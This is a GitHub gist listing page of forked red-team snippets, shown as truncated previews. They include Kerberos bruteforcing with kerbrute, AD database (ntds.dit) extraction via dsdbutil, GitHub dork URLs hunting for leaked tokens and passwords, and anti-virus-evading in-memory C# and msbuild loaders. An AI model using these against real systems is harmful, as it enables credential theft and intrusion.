Kerberos cheatsheet
Bruteforcing
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
sasqwatch
/ dsdbutil.exe
Created Sep 16, 2019
— forked from bohops/dsdbutil.exe
yet another native AD database extraction utility
View dsdbutil.exe
| DSDButil | |
| ======== | |
| - dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)] | |
| - dsdbutil supports VSS snapshot creation | |
| - dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py) | |
| - Example #1: Using Snapshot GUID obtained from cmd output | |
| dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit" |
sasqwatch
/ kerberos_attacks_cheatsheet.md
Created Sep 4, 2019
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md
sasqwatch
/ FindingComputersWithLocalAdmin.md
Created Aug 30, 2019
— forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
View FindingComputersWithLocalAdmin.md
Computer accounts added to local admins on machines via a group in the local admins
MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
Computer accounts added to local admins on machines explicitly
sasqwatch
/ auto_git_query
Created Aug 28, 2019
— forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
View auto_git_query
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
sasqwatch
/ UserWritableLocations.ps1
Created Aug 19, 2019
— forked from hinchley/UserWritableLocations.ps1
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
View UserWritableLocations.ps1
| # Paths that we've already excluded via AppLocker. | |
| $exclusions = @() | |
| # Paths to process. | |
| $paths = @( | |
| "C:\Windows" | |
| ) | |
| # Setup log. | |
| $log = "$PSScriptRoot\UserWritableLocations.log" |
sasqwatch
/ UserWritableLocations.ps1
Created Aug 19, 2019
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
View UserWritableLocations.ps1
| # Paths that we've already excluded via AppLocker. | |
| $exclusions = @() | |
| # Paths to process. | |
| $paths = @( | |
| "C:\Windows" | |
| ) | |
| # Setup log. | |
| $log = "$PSScriptRoot\UserWritableLocations.log" |
sasqwatch
/ Disable-Fusion-Log-.NET-Assembly-Binding-Logging.bat
Created Aug 19, 2019
— forked from jpluimers/Disable-Fusion-Log-.NET-Assembly-Binding-Logging.bat
.NET enable and disable Fusion log
View Disable-Fusion-Log-.NET-Assembly-Binding-Logging.bat
| reg add "HKLM\Software\Microsoft\Fusion" /v EnableLog /t REG_DWORD /d 0 /f |
sasqwatch
/ CompileInMemory.cs
Created Aug 19, 2019
— forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/ However, this will still execute csc.exe and drop a dll to %temp% https://twitter.com/Laughing_Mantis/status/991018563296157696
View CompileInMemory.cs
| using System; | |
| using System.Collections.Generic; | |
| using System.Text; | |
| using System.CodeDom.Compiler; | |
| using Microsoft.CSharp; | |
| using System.IO; | |
| using System.Reflection; | |
| namespace InMemoryCompiler | |
| { | |
| class Program |
sasqwatch
/ JankyAF.csproj
Created Aug 19, 2019
— forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
View JankyAF.csproj
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
sasqwatch
/ wifiscan.cmd
Created Aug 15, 2019
— forked from joswr1ght/wifiscan.cmd
Wi-Fi Scanning at the Windows Command Prompt, FOR loop style
View wifiscan.cmd
| FOR /L %N IN () DO @netsh wlan show networks mode=bssid | findstr "^SSID Signal" && ping -n 16 127.0.0.1 >NUL && cls |
NewerOlder